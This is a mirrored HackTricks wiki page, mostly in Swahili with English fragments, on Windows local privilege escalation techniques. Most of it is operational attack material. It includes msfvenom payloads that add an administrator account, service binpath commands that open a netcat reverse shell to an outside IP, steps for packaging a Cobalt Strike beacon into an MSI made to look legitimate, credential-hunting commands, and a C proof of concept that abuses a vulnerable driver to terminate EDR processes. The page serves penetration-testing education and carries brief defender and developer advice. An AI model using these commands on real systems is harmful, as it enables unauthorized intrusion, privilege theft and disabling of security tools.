maride/hacktricks

Fork 0

mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00

Translator 64ad895e9c Translated ['', 'src/pentesting-web/file-inclusion/lfi2rce-via-php-filte

2025-09-04 01:04:45 +00:00

81 KiB

Raw Blame History

Windows Local Privilege Escalation

Best tool to look for Windows local privilege escalation vectors: WinPEAS

Nadhariya ya Awali ya Windows

Access Tokens

Ikiwa haujui Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:

{{#ref}} access-tokens.md {{#endref}}

ACLs - DACLs/SACLs/ACEs

Angalia ukurasa ufuatao kwa habari zaidi kuhusu ACLs - DACLs/SACLs/ACEs:

{{#ref}} acls-dacls-sacls-aces.md {{#endref}}

Integrity Levels

Ikiwa haujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:

{{#ref}} integrity-levels.md {{#endref}}

Udhibiti wa Usalama wa Windows

Kuna vitu mbalimbali katika Windows vinavyoweza prevent you from enumerating the system, run executables au hata detect your activities. Unapaswa read ukurasa ufuatao na enumerate mipango yote ya defenses mechanisms kabla ya kuanza the privilege escalation enumeration:

{{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}}

System Info

Version info enumeration

Angalia kama toleo la Windows lina udhaifu unaojulikana (angalia pia patches zilizowekwa).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

Tovuti hii site ni ya msaada kwa kutafuta taarifa za kina kuhusu Microsoft security vulnerabilities. Hifadhidata hii ina zaidi ya 4,700 security vulnerabilities, ikionyesha massive attack surface ambayo mazingira ya Windows yanatoa.

On the system

post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester
watson
winpeas (Winpeas has watson embedded)

Locally with system information

Github repos of exploits:

Mazingira

Je, kuna credential/Juicy info iliyohifadhiwa katika env variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

Historia ya PowerShell

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Faili za Transcript

Unaweza kujifunza jinsi ya kuiwasha hapa: https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Maelezo ya utekelezaji wa pipeline za PowerShell yanarekodiwa, ikijumuisha amri zilizotekelezwa, miito ya amri, na sehemu za skripti. Hata hivyo, maelezo kamili ya utekelezaji na matokeo huenda yasirekodiwe.

Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya nyaraka, ukichagua "Module Logging" badala ya "Powershell Transcription".

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Ili kuona matukio 15 ya mwisho kutoka kwa PowerShell logs unaweza kutekeleza:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script inakusanywa, ikihakikisha kwamba kila block of code imedokumentiwa wakati inavyoendeshwa. Mchakato huu unahifadhi audit trail kamili ya kila shughuli, muhimu kwa forensics na kuchambua tabia zenye madhara. Kwa kurekodi shughuli zote wakati wa utekelezaji, panapatikana taarifa za kina kuhusu mchakato.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Matukio ya logi za Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Mipangilio ya Intaneti

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Diski

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Unaweza compromise mfumo ikiwa sasisho hazitafutwi kwa kutumia httpS bali http.

Unaanza kwa kuangalia kama mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo katika cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Au yafuatayo katika PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

Ikiwa unapata jibu kama mojawapo ya hizi:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equals to 1.

Then, it is exploitable. If the last registry is equals to 0, then, the WSUS entry will be ignored.

In order to exploit this vulnerabilities you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.

Read the research here:

{{#file}} CTX_WSUSpect_White_Paper (1).pdf {{#endfile}}

WSUS CVE-2020-1013

Read the complete report here.
Basically, this is the flaw that this bug exploits:

If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Wakala wengi wa kampuni huweka uso wa localhost IPC na channel ya update yenye hadhi ya kipekee. Ikiwa enrollment inaweza kulazimishwa kwenda kwenye server ya mshambuliaji na updater inamwamini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa localhost anaweza kusambaza MSI mbaya ambayo huduma ya SYSTEM itainstall. Angalia mbinu jumla (inayotokana na mnyororo wa Netskope stAgentSvc – CVE-2025-0309) hapa:

{{#ref}} abusing-auto-updaters-and-ipc.md {{#endref}}

KrbRelayUp

Udhaifu wa local privilege escalation upo katika mazingira ya Windows domain chini ya masharti maalumu. Masharti haya ni pamoja na mazingira ambapo LDAP signing is not enforced, watumiaji wana haki za kujipatia zinazowaruhusu kusanidi Resource-Based Constrained Delegation (RBCD), na uwezo wa watumiaji kuunda computers ndani ya domain. Ni muhimu kutambua kwamba mahitaji haya yanatimizwa kwa kutumia mipangilio ya chaguo-msingi.

Find the exploit in https://github.com/Dec0ne/KrbRelayUp

For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

Ikiwa una meterpreter session, unaweza kufanya mbinu hii kiotomatiki kwa kutumia module exploit/windows/local/always_install_elevated

PowerUP

Tumia amri Write-UserAddMSI kutoka power-up kuunda ndani ya saraka ya sasa Windows MSI binary ili escalate privileges. Script hii inaandika installer ya MSI iliyotengenezwa kabla ambayo itauliza kuongeza user/group (kwa hivyo utahitaji GIU access):

Write-UserAddMSI

Just execute the created binary to escalate privileges.

MSI Wrapper

Soma mafunzo haya ili kujifunza jinsi ya kuunda MSI wrapper ukitumia zana hizi. Kumbuka unaweza kufunga faili ".bat" ikiwa unataka tu kutekeleza mistari ya amri

{{#ref}} msi-wrapper.md {{#endref}}

Create MSI with WIX

{{#ref}} create-msi-with-wix.md {{#endref}}

Unda MSI kwa Visual Studio

Tengeneza kwa Cobalt Strike au Metasploit new Windows EXE TCP payload katika C:\privesc\beacon.exe
Fungua Visual Studio, chagua Create a new project na andika "installer" kwenye kisanduku cha utafutaji. Chagua mradi wa Setup Wizard na bonyeza Next.
Toa jina kwa mradi, kama AlwaysPrivesc, tumia C:\privesc kwa eneo, chagua place solution and project in the same directory, na bonyeza Create.
Endelea kubonyeza Next hadi ufikie hatua 3 ya 4 (chagua faili za kuingiza). Bonyeza Add na chagua Beacon payload uliyoitengeneza. Kisha bonyeza Finish.
Chagua mradi wa AlwaysPrivesc katika Solution Explorer na katika Properties, badilisha TargetPlatform kutoka x86 hadi x64.
Kuna mali nyingine unaweza kubadilisha, kama Author na Manufacturer ambazo zinaweza kufanya app iliyosanikishwa ionekane halali zaidi.
Bonyeza kulia mradi na chagua View > Custom Actions.
Bonyeza kulia Install na chagua Add Custom Action.
Bonyeza mara mbili kwenye Application Folder, chagua faili yako ya beacon.exe na bonyeza OK. Hii itahakikisha kwamba beacon payload itatekelezwa mara tu installer itakapotekelezwa.
Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
Mwishowe, build.
Ikiwa onyo File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' litaonekana, hakikisha umeweka platform kuwa x64.

Ufungaji wa MSI

Ili kutekeleza usakinishaji wa faili mbaya .msi kwa background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Ili kuchukua faida ya udhaifu huu unaweza kutumia: exploit/windows/local/always_install_elevated

Antivirus na Vigunduzi

Mipangilio ya Ukaguzi

Mipangilio haya yanaamua nini kinachokuwa kurekodiwa, kwa hivyo unapaswa kulipa umakini.

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, ni muhimu kujua wapi logs zinatumwa

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS imeundwa kwa ajili ya usimamizi wa local Administrator passwords, kuhakikisha kila moja ni ya kipekee, ya nasibu, na inasasishwa mara kwa mara kwenye kompyuta zilizojiunga na domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji waliopewa ruhusa za kutosha kupitia ACLs, kuwapa uwezo wa kuona local admin passwords ikiwa wameidhinishwa.

{{#ref}} ../active-directory-methodology/laps.md {{#endref}}

WDigest

Ikiwa imewezeshwa, plain-text passwords zimehifadhiwa katika LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Kuanzia na Windows 8.1, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili block majaribio ya michakato isiyo ya kuaminika ya read its memory au inject code, hivyo kuongeza usalama wa mfumo.
More info about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard ilianzishwa katika Windows 10. Kazi yake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| Taarifa zaidi kuhusu Credentials Guard hapa.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials huathibitishwa na Local Security Authority (LSA) na hutumiwa na komponenti za mfumo wa uendeshaji. Wakati taarifa za kuingia za mtumiaji zinapothibitishwa na registered security package, domain credentials za mtumiaji kwa kawaida huanzishwa.
More info about Cached Credentials here.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Watumiaji & Vikundi

Orodhesha Watumiaji & Vikundi

Unapaswa kuangalia ikiwa yoyote ya vikundi ambamo uko ina ruhusa za kuvutia

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Vikundi vyenye mamlaka

Ikiwa upo katika kundi lenye vibali vya juu, unaweza kuwa na uwezo wa kupandisha vibali. Jifunze kuhusu vikundi vyenye vibali na jinsi ya kuvitumia vibaya ili kupandisha vibali hapa:

{{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}}

Token manipulation

Jifunze zaidi kuhusu ni nini token katika ukurasa huu: Windows Tokens.
Angalia ukurasa ufuatao ili jifunze kuhusu tokens zinazovutia na jinsi ya kuvitumia vibaya:

{{#ref}} privilege-escalation-abusing-tokens.md {{#endref}}

Watumiaji walioingia / Vikao

qwinsta
klist sessions

Folda za nyumbani

dir C:\Users
Get-ChildItem C:\Users

Sera ya Nywila

net accounts

Pata yaliyomo kwenye clipboard

powershell -command "Get-Clipboard"

Michakato Zinazokimbia

Ruhusa za Faili na Folda

Kwanza kabisa, unapoorodhesha michakato, angalia kama kuna nywila ndani ya mstari wa amri wa mchakato.
Angalia ikiwa unaweza kuandika tena binary fulani inayokimbia au ikiwa una ruhusa za kuandika kwenye folda ya binary ili kuchukua faida ya DLL Hijacking attacks zinazowezekana:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Daima angalia uwezekano wa electron/cef/chromium debuggers running, you could abuse it to escalate privileges.

Kuangalia ruhusa za binaries za michakato

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kukagua ruhusa za folda za binari za michakato (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

Unaweza kuunda dump ya memory ya mchakato unaoendesha kwa kutumia procdump kutoka sysinternals. Huduma kama FTP zina credentials in clear text in memory, jaribu kufanya dump ya memory na kusoma credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Programu za GUI zisizo salama

Programu zinazotumia SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.

Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt"

Huduma

Pata orodha ya huduma:

net start
wmic service list brief
sc query
Get-Service

Ruhusa

Unaweza kutumia sc kupata taarifa za huduma

sc qc <service_name>

Inashauriwa kuwa na binary accesschk kutoka Sysinternals ili kuchunguza kiwango cha ruhusa kinachohitajika kwa kila huduma.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Inashauriwa kuangalia kama "Authenticated Users" wanaweza kubadilisha huduma yoyote:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP for here

Kuwezesha huduma

Ikiwa unapata kosa hili (kwa mfano na SSDPSRV):

Kosa la mfumo 1058 limetokea.
Huduma haiwezi kuanzishwa, ama kwa sababu imezimwa au kwa sababu haina vifaa vilivyowezeshwa vinavyohusiana nayo.

Unaweza kuiwezesha kwa kutumia

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Kumbuka kwamba service upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)

Njia mbadala ya tatizo hili ni kuendesha:

sc.exe config usosvc start= auto

Badilisha service binary path

Katika tukio ambapo kundi "Authenticated users" lina SERVICE_ALL_ACCESS kwenye service, inawezekana kubadilisha executable binary ya service. Ili kubadilisha na kuendesha sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Anzisha upya huduma

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Privileges can be escalated through various permissions:

SERVICE_CHANGE_CONFIG: Inaruhusu kubadilisha usanidi wa service binary.
WRITE_DAC: Inawezesha kubadilisha vibali, na hivyo kutoa uwezo wa kubadilisha usanidi za service.
WRITE_OWNER: Inaruhusu kupata umiliki na kubadilisha vibali.
GENERIC_WRITE: Inarithi uwezo wa kubadilisha usanidi za service.
GENERIC_ALL: Pia inarithi uwezo wa kubadilisha usanidi za service.

For the detection and exploitation of this vulnerability, the exploit/windows/local/service_permissions can be utilized.

Ruhusa dhaifu za service binaries

Kagua kama unaweza kubadilisha binary ambayo inaendeshwa na service au ikiwa una vibali vya kuandika kwenye folder ambapo binary iko (DLL Hijacking).
Unaweza kupata kila binary inayotekelezwa na service kwa kutumia wmic (not in system32) na kukagua vibali vyako kwa kutumia icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Unaweza pia kutumia sc na icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Ruhusa za kubadilisha rejista ya huduma

Unapaswa kuangalia ikiwa unaweza kubadilisha rejista yoyote ya huduma.
Unaweza kukagua idhini zako juu ya rejista ya huduma kwa kufanya:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Inapaswa kukaguliwa ikiwa Authenticated Users au NT AUTHORITY\INTERACTIVE wana ruhusa za FullControl. Ikiwa ni hivyo, binary inayotekelezwa na service inaweza kubadilishwa.

Ili kubadilisha Path ya binary inayotekelezwa:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services registry AppendData/AddSubdirectory permissions

Ikiwa una ruhusa hii juu ya registry, hii inamaanisha kwamba unaweza kuunda sub registries kutoka kwa registry hii. Kwa Windows services, hii ni ya kutosha kutekeleza arbitrary code:

{{#ref}} appenddata-addsubdirectory-permission-over-service-registry.md {{#endref}}

Unquoted Service Paths

Ikiwa path kuelekea executable haiko ndani ya quotes, Windows itajaribu kutekeleza kila sehemu kabla ya space.

For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Orodhesha njia zote za huduma zisizo na nukuu, ukiziondoa zile za huduma za Windows zilizojengwa:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Unaweza kugundua na exploit udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda kifaili cha huduma kwa mikono kwa metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Hatua za Kupona

Windows inaruhusu watumiaji kutaja vitendo vitakavyotekelezwa ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuonyesha kwenye binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana kwenye nyaraka rasmi.

Programu

Programu Zilizowekwa

Angalia idhini za binaries (labda unaweza kuibadilisha mmoja na escalate privileges) na za folda (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Ruhusa za Kuandika

Angalia kama unaweza kubadilisha baadhi ya faili za usanidi (config file) ili kusoma faili maalum au kama unaweza kubadilisha binary fulani itakayotekelezwa na akaunti ya Administrator (schedtasks).

Njia ya kupata ruhusa dhaifu za folder/faili kwenye mfumo ni kufanya:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Endeshwa wakati wa kuanzishwa

Angalia kama unaweza kuandika tena registry au binary zitakazotekelezwa na mtumiaji mwingine.
Soma ukurasa ufuatayo ili ujifunze zaidi kuhusu maeneo ya autoruns ya kuvutia ya kuongeza privileges:

{{#ref}} privilege-escalation-with-autorun-binaries.md {{#endref}}

Drivers

Tafuta drivers za wahusika wa tatu ambazo zinaweza kuwa zisizo za kawaida/zilizo na udhaifu

driverquery
driverquery.exe /fo table
driverquery /SI

If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step‑by‑step technique here:

{{#ref}} arbitrary-kernel-rw-token-theft.md {{#endref}}

Kutumia kukosa FILE_DEVICE_SECURE_OPEN kwenye device objects (LPE + EDR kill)

Baadhi ya signed third‑party drivers huunda device object zao zikiwa na SDDL thabiti kupitia IoCreateDeviceSecure lakini hukosa kuweka FILE_DEVICE_SECURE_OPEN katika DeviceCharacteristics. Bila bendera hii, secure DACL haitatekelezwa wakati device inafunguliwa kupitia path inayojumuisha sehemu ya ziada, ikiruhusu mtumiaji asiye na ruhusa kupata handle kwa kutumia namespace path kama:

\ .\DeviceName\anything
\ .\amsdk\anyfile (from a real-world case)

Baada mtumiaji anapoweza kufungua device, privileged IOCTLs exposed by the driver zinaweza kutumika kwa LPE na tampering. Uwezo mfano ulioshuhudiwa katika mazingira halisi:

Kurudisha full-access handles kwa arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
Terminate arbitrary processes, including Protected Process/Light (PP/PPL), ikiruhusu AV/EDR kill kutoka user land via kernel.

Minimal PoC pattern (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Mikakati kwa waendelezaji

Kila mara weka FILE_DEVICE_SECURE_OPEN unapotengeneza device objects zilizokusudiwa kuzuiliwa na DACL.
Thibitisha muktadha wa caller kwa shughuli zenye vipaumbele. Ongeza PP/PPL checks kabla ya kuruhusu process termination au kurudisha handle.
Punguza IOCTLs (access masks, METHOD_*, input validation) na fikiria brokered models badala ya ruhusa za moja kwa moja za kernel.

Mbinu za kugundua kwa watetezi

Fuatilia user-mode opens za majina ya kifaa yenye kutiliwa shaka (e.g., \ .\amsdk*) na mfululizo maalum wa IOCTL unaoashiria matumizi mabaya.
Tekeleza Microsoft’s vulnerable driver blocklist (HVCI/WDAC/Smart App Control) na simamia orodha zako za allow/deny.

PATH DLL Hijacking

If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.

Kagua ruhusa za folda zote ndani ya PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu:

{{#ref}} dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md {{#endref}}

Mtandao

Sehemu zilizoshirikiwa

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Angalia kompyuta nyingine zinazojulikana zilizo hardcoded kwenye hosts file

type C:\Windows\System32\drivers\etc\hosts

Kiolesura za Mtandao na DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Ports

